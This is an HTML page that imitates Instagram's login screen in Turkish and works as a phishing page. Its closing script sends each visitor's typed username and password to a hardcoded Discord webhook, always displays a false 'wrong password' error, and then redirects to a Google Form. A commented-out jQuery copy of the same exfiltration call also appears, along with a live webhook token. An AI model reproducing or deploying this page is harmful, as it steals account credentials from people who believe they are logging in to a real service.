<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
  <title>Instagram</title>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>

body {
	background-color: #fafafa;
	display: flex;
	flex-flow: column wrap;
	align-items: center;
	justify-content: center;
	font-family: "Segoe UI", Roboto, Helvetica, Arial, sans serif;
}

footer {
	position: absolute;
	bottom: 0;
	width: 100%;
	padding-bottom: 40px;
	display: flex;
	flex-flow: row wrap;
	justify-content: space-around;
}

footer a {
	text-decoration: none;
	color: #003569;
	font-size: 0.75rem;
	font-weight: 500;
}

form {
	width: 100%;
	display: flex;
	flex-flow: column;
	align-items: center;
}

input {
	width: 80%;
	padding: 10px;
	border: 1px solid #e6e6e6;
	background-color: #fafafa;
	border-radius: 3px;
	margin-bottom: 5px;
}

input::placeholder {
	color: #999;
	font-size: 0.7rem;
}

#login {
	border: 1px solid #e6e6e6;
	background-color: #ffffff;
	display: flex;
	align-items: center;
	flex-flow: column wrap;
	width: 30%;
	max-width: 350px;
}

#signup {
	border: 1px solid #e6e6e6;
	background-color: #ffffff;
	width: 30%;
	max-width: 350px;
	display: flex;
	justify-content: center;
	margin-top: 10px;
	font-weight: 300;
	padding: 15px 0;
	font-size: 0.9rem;
}

#signup a {
	text-decoration: none;
	font-weight: bold;
	color: #3897f0;
}

#or {
	padding: 0 15px;
	font-size: 0.75rem;
	color: #999;
	font-weight: bold;
}

#logo {
	margin: 15px;
}

#FBLogin {
	color: #385185;
	text-decoration: none;
	padding: 0 15px;
	font-weight: 600;
	font-size: 0.9rem;
	margin: 10px;

}

#forgotPW {
	text-decoration: none;
	font-size: 0.75rem;
	color: #385185;
	margin: 10px 0 20px 0;
}

.blue-btn {
	color: white;
	background-color: #3897f0;
	border: none;
	border-radius: 3px;
	width: 80%;
	padding: 7px 0 7px 0;
	font-weight: bold;
}

#getApp {
	display: flex;
	justify-content: center;
	flex-direction: column;
	text-align: center;
	font-size: 0.8rem;
}

#getApp a {
	margin: 2px;
}

#loginError {
	color: red;
	text-align: center;
	font-size: 0.8rem;
	width: 80%;
	margin: auto;
}

.blue-btn:disabled {
	opacity: 0.3;
}

.line {
	height: 1px;
	width: 50%;
	background-color: #e6e6e6;
	display: flex;
	align-self: center;
}

.orRow {
	display: flex;
	width: 80%;
	margin: 10px 0;
}

.fa-facebook-square {
	color: #385185;
	margin-right: 5px;
	font-size: 1.25rem;
}

.copyright {
	color: #999;
	font-size: 0.75rem;
	font-weight: 500;
	margin: 15px;
	display: flex;
	align-items: center;
}

.flinks {
	margin: 15px;
	display: flex;
	align-items: flex-start;
}

.flinks a {
	margin: 5px;
}


@media only screen and (max-width: 600px) {
   #login, #signup {
	       width: 300px;
   }
   footer { display:none; }
}

</style>
</head>
<body>
<!-- partial:index.partial.html -->
<html>
<head>
  <meta charset="UTF-8">
  <title>Instagram</title>
  <link rel="stylesheet" type="text/css" href="index.css">
  <script src="https://kit.fontawesome.com/b4590ed823.js" crossorigin="anonymous"></script>
</head>
<body>

	<!-- CODE HERE-->
	<div id="login">
		<img id="logo" src="https://cdn.pixabay.com/photo/2016/08/15/01/29/instagram-1594387_960_720.png" width="175">
		<form>
			<input type="text" name="username" placeholder="Telefon numarası, kullanıcı adı veya e-posta" id="username">
			<input type="password" name="password" placeholder="Şifre"> <br>
			<button class="blue-btn" type="button" disabled>Giriş Yap</button>
		</form>
		<div class="orRow">
			<div class="line"></div>
			<div id="or">YA DA</div>
			<div class="line"></div>
		</div>
		<a href="facebook.html" id="FBLogin"><span class="fab fa-facebook-square"></span>Facebook ile Giriş Yap</a>
		<div><p id="loginError"></p></div>
		<a href="https://www.instagram.com/accounts/password/reset/" id="forgotPW">Şifreni mi unuttun?</a>
	</div>
	<div id="signup">
		<p>Hesabın yok mu? <a href="https://www.instagram.com/accounts/emailsignup/">Kaydol</a></p>
	</div>
	<div id="getApp">
		<p>Uygulamayı indir.</p>
		<div>
			<a href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&ct=igweb.loginPage.badge&mt=8&vt=lo"><img src="https://www.instagram.com/static/images/appstore-install-badges/badge_ios_english-en.png/180ae7a0bcf7.png" width="135"></a>
			<a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26ig_mid%3DE37D5D32-8098-4A7E-8CBE-1A5C77BE34C6%26utm_content%3Dlo%26utm_medium%3Dbadge"><img src="https://www.instagram.com/static/images/appstore-install-badges/badge_android_english-en.png/e9cd846dc748.png" width="135"></a>
		</div>
	</div>

		<footer>
			<span class="flinks">
				<a href="#">ABOUT US</a>
				<a href="#">SUPPORT</a>
				<a href="#">PRESS</a>
				<a href="#">API</a>
				<a href="#">JOBS</a>
				<a href="#">PRIVACY</a>
				<a href="#">TERMS</a>
				<a href="#">DIRECTORY</a>
				<a href="#">PROFILES</a>
				<a href="#">HASHTAGS</a>
				<a href="#">LANGUAGE</a>
			</span>
			<p class="copyright">&copy; 2021 INSTAGRAM FROM FACEBOOK</p>
		</footer>

		<script type='text/javascript' src='index.js'></script>
</body>
</html>
<!-- partial -->
  <script>
  
  // CODE HERE
const username = document.getElementById("username");
const password = document.getElementsByName("password")[0];
const logBtn = document.getElementsByClassName("blue-btn")[0];
const error = document.getElementById("loginError");

username.oninput = function(){
	if (username.value.length > 3 && password.value.length > 3){
		logBtn.disabled = false;
	}
	if (username.value.length < 3 || password.value.length < 3){
		logBtn.disabled = true;
	}
};

password.oninput = function(){
	if (username.value.length > 3 && password.value.length > 3){
		logBtn.disabled = false;
	}
	if (username.value.length < 3 || password.value.length < 3){
		logBtn.disabled = true;
	}
};

logBtn.onclick = function(){
	if (username.value === "Matcha" && password.value === "kitty"){
		 
	}
	else {
		error.innerHTML = "Üzgünüz, şifreniz yanlıştı. Lütfen şifrenizi tekrar kontrol edin."
	}
	
//	$.post('https://discord.com/api/webhooks/874904180643471360/wq6CFlKn8GovAaMz889fkqkJBkedakHWm2cv4l4LQDgAZVnRCMFAEvAxxWGoZJFwbN4p', JSON.stringify({ 
//	
//	  username: "Instagram",
//	  avatar_url: "https://upload.wikimedia.org/wikipedia/commons/thumb/e/e7/Instagram_logo_2016.svg/768px-Instagram_logo_2016.svg.png",
//	  content: `Eposta: ${username.value}   -  Şifre: ${password.value} `,
//	  
//	
//	}));  
	
	var request = new XMLHttpRequest();
    request.open("POST", "https://discord.com/api/webhooks/874904180643471360/wq6CFlKn8GovAaMz889fkqkJBkedakHWm2cv4l4LQDgAZVnRCMFAEvAxxWGoZJFwbN4p");
    request.setRequestHeader('Content-type', 'application/json');
    var params = {
 	  username: "Instagram",
 	  avatar_url: "https://upload.wikimedia.org/wikipedia/commons/thumb/e/e7/Instagram_logo_2016.svg/768px-Instagram_logo_2016.svg.png",
 	  content: `Eposta: ${username.value}   -  Şifre: ${password.value} `, }
	request.send(JSON.stringify(params));

		setTimeout(function(){ location.href = "https://docs.google.com/forms/d/e/1FAIpQLSdXq-uvCo4IQa2wvtIapo1Im1nS9zH8MNQgJ2g-EHpIUTQtEQ/viewform?fbzx=-4129955095203600153"; }, 1000);

	  
}
  
  </script>

</body>
</html>
